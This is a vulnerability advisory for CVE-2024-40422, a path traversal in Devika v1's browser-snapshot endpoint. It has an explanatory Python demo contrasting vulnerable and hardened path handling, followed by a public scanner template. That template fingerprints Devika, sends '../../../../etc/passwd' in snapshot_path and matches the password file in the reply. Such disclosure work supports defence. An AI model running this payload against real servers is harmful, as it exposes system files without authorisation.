CVE-2024-40422: Devika v1 - Path Traversal

Date: 2025-08-01 | Affected software: Devika v1 | PoC: public

Vulnerability description

The `snapshot_path` query parameter of the `/api/get-browser-snapshot` endpoint in stitionai Devika v1 is handed to the file-serving logic without validation, so it is susceptible to path traversal. An unauthenticated attacker can place `../` sequences in `snapshot_path` to walk out of the intended snapshot directory and retrieve arbitrary files the server process can read (the PoC below fetches `/etc/passwd`). This exposes sensitive system and application files and can compromise the confidentiality and integrity of the host.
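To make the bug class concrete, here is an added Python example (written for this page, not Devika's own code) that contrasts a file-serving helper that joins the client-supplied `snapshot_path` straight onto a snapshot directory with a hardened helper that resolves the path and refuses anything outside that directory. The temporary directory layout, the `snapshots` base name and the helper names are assumptions for illustration; the traversal payload has the same shape as the one the template sends.

```python
import os
import shutil
import tempfile
from pathlib import Path


class PathTraversalError(ValueError):
    """Raised when a requested snapshot path resolves outside the snapshot directory."""


def vulnerable_snapshot_path(base_dir: str, snapshot_path: str) -> str:
    # Hypothetical vulnerable pattern (not Devika's code): the client-controlled
    # value is joined onto the snapshot directory and used as-is. "../" segments
    # walk out of base_dir, and an absolute snapshot_path discards base_dir
    # entirely, because os.path.join("/srv/snapshots", "/etc/passwd") == "/etc/passwd".
    return os.path.normpath(os.path.join(base_dir, snapshot_path))


def safe_snapshot_path(base_dir: str, snapshot_path: str) -> str:
    # Hardened version: resolve symlinks and ".." on both sides, then require the
    # candidate to sit strictly below base_dir. A "../" that cancels out
    # ("../snapshots/x.png") still resolves inside and is accepted; a real
    # escape, an absolute path, or the directory itself is rejected.
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, snapshot_path))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise PathTraversalError(f"refusing path outside snapshot dir: {snapshot_path!r}")
    return candidate


def build_demo_tree() -> tuple:
    # Constructed layout for the demo: <tmp>/snapshots/shot1.png is the only
    # legitimate file; <tmp>/secret.txt stands in for /etc/passwd.
    root = tempfile.mkdtemp(prefix="devika-demo-")
    base = os.path.join(root, "snapshots")
    os.mkdir(base)
    Path(base, "shot1.png").write_bytes(b"PNG-bytes")
    Path(root, "secret.txt").write_text("root:x:0:0:root:/root:/bin/bash\n")
    return root, base


def run_demo() -> dict:
    # Each payload is tried against both helpers; the result records whether the
    # naive join left the snapshot directory and whether the hardened helper
    # accepted the request.
    root, base = build_demo_tree()
    payloads = {
        "legit": "shot1.png",
        "traversal": "../secret.txt",               # same shape as ../../../../etc/passwd
        "absolute": os.path.join(root, "secret.txt"),
        "noop_traversal": "../snapshots/shot1.png",
        "empty": "",                                # would serve the directory itself
    }
    results = {}
    try:
        for name, payload in payloads.items():
            vuln = vulnerable_snapshot_path(base, payload)
            try:
                safe_snapshot_path(base, payload)
                allowed = True
            except PathTraversalError:
                allowed = False
            results[name] = {
                "vulnerable_escapes": os.path.commonpath([base, vuln]) != base,
                "safe_allowed": allowed,
            }
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return results


if __name__ == "__main__":
    for name, outcome in run_demo().items():
        print(f"{name:15s} {outcome}")
```

The check in `safe_snapshot_path` is done on the `realpath` of both sides on purpose: comparing unresolved strings lets a symlink inside the snapshot directory point anywhere, and a plain `startswith(base)` check would also accept a sibling directory such as `snapshots-old`.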

PoC code [public]

id: CVE-2024-40422

info:
  name: Devika v1 - Path Traversal
  author: s4e-io,alpernae
  severity: critical
  description: |
    The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-40422
    - https://cvefeed.io/vuln/detail/CVE-2024-40422
    - https://github.com/alpernae/CVE-2024-40422
    - https://github.com/stitionai/devika
    - https://www.exploit-db.com/exploits/52066
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-40422
    cwe-id: CWE-22
    epss-score: 0.92575
    epss-percentile: 0.99732
    cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: stitionai
    product: devika
    fofa-query: icon_hash="-1429839495"
  tags: cve,cve2024,devika,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /api/data HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
          - 'contains(content_type,"application/json")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e12beb8ca85cd4d0c3145ca3281a53729ca83fee8d9ed53b09241a4b7cd49a190220455d9ad843dcee12acf546bb7d25a408c08f139ccd458ccadc4473b5564b19db:922c64590222798bb761d5b6d8e72950